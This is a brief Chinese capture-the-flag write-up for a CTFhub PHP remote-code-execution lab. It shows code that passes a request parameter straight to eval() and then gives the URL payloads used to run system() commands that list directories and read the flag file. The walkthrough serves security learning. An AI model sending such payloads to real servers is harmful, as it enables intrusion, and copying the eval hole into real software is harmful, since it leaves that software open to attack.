CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
行思理7 小时前
微信支付“商家转账用户确认模式”,新手教程
java·开发语言·微信
cyforkk7 小时前
Vercel 绑定自定义域名极简配置指南
服务器·前端·网络
空中湖7 小时前
Spring AI RAG 完整实战:从零搭建企业知识库问答系统
java·人工智能·spring
Ai拆代码的曹操8 小时前
K8s Pod Pending 逐层排查:从 FailedScheduling 到 PVC StorageClass 不存在的实战记录
java·linux·kubernetes
什巳8 小时前
JAVA练习306- 翻转二叉树
java·数据结构·算法·leetcode
IT_陈寒8 小时前
React useEffect依赖数组中埋的坑,这次终于让我逮到了
前端·人工智能·后端
wangbing11259 小时前
JPA下自定义主键
java·linux·服务器
FourAu9 小时前
2026 前端突围指南:从 ESR 边缘渲染到封装 Web AI SDK,聊聊 AI 时代的职业进化
前端·人工智能
Zkeq9 小时前
不止是聊天框:我用 EdgeOne Makers Agents 给烹饪 APP 加了一位能“改菜谱”的 AI 主厨
前端